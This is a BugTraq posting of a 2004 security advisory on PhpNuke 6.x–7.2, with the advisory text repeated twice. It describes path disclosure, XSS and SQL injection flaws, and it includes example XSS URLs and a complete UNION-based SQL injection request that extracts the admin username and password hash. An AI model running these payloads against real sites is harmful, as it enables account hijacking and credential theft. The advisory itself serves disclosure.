BugTraq
Back to list
|
Post reply
[waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2]
May 05 2004 04:02PM
Janek Vind (come2waraxe yahoo com)
{=======================================================================
=========}
{ [waraxe-2004-SA#027] }
{=======================================================================
=========}
{ }
{ [ Once again - critical vulnerabilities in PhpNuke 6.x - 7.2 ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 05. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=27
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it's freeware, easy to install and has broad set of features.
Homepage: http://phpnuke.org
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - unsanitaized user submitted variable "show" can triger standard php error messages,
revealing full path to script - information, needed for potential hacker.
Example: make http request like this:
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid
=2&show=foobar
and error message appears:
Warning: Division by zero in D:\apache_wwwroot\nuke72\modules\Downloads\index.php on line 797
B. Cross-site scripting aka XSS:
XSS can be used for cookie stealing, and because in PhpNuke authentication-related information
is stored in cookies, account's hijacking and ID spoof can happen.
B1 - XSS through unsanitaized user submitted variable "ttitle":
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid
=0&ttitle=[xss code here]
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid
=0&ttitle=<body onload=document.title=1337>
B2 - XSS through unsanitaized user submitted variable "sid":
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&si
d=[xss code here]
C. Sql injection:
C1 - noncritical sql injection through unsanitaized user submitted variable "orderby":
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid
=2&orderby=foobar
C3 - critical sql injection through unsanitaized user submitted variable "sid":
Let's look at original code from "nuke72/modules/Downloads/index.php" line 901:
$result=$db->sql_query("
SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
");
Oops, "$sid" variable is unquoted in sql query. Scary...
What, if we request something like:
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&si
d=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_a
uthors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
Cool - admin's username and password's md5 hash in plaintext :)
Have a nice day!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
{=======================================================================
=========}
{ [waraxe-2004-SA#027] }
{=======================================================================
=========}
{ }
{ [ Once again - critical vulnerabilities in PhpNuke 6.x - 7.2 ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 05. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=27
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it's freeware, easy to install and has broad set of features.
Homepage: http://phpnuke.org
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - unsanitaized user submitted variable "show" can triger standard php error messages,
revealing full path to script - information, needed for potential hacker.
Example: make http request like this:
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid
=2&show=foobar
and error message appears:
Warning: Division by zero in D:\apache_wwwroot\nuke72\modules\Downloads\index.php on line 797
B. Cross-site scripting aka XSS:
XSS can be used for cookie stealing, and because in PhpNuke authentication-related information
is stored in cookies, account's hijacking and ID spoof can happen.
B1 - XSS through unsanitaized user submitted variable "ttitle":
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid
=0&ttitle=[xss code here]
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid
=0&ttitle=<body onload=document.title=1337>
B2 - XSS through unsanitaized user submitted variable "sid":
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&si
d=[xss code here]
C. Sql injection:
C1 - noncritical sql injection through unsanitaized user submitted variable "orderby":
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid
=2&orderby=foobar
C3 - critical sql injection through unsanitaized user submitted variable "sid":
Let's look at original code from "nuke72/modules/Downloads/index.php" line 901:
$result=$db->sql_query("
SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
");
Oops, "$sid" variable is unquoted in sql query. Scary...
What, if we request something like:
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&si
d=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_a
uthors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
Cool - admin's username and password's md5 hash in plaintext :)
Have a nice day!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
[ reply ]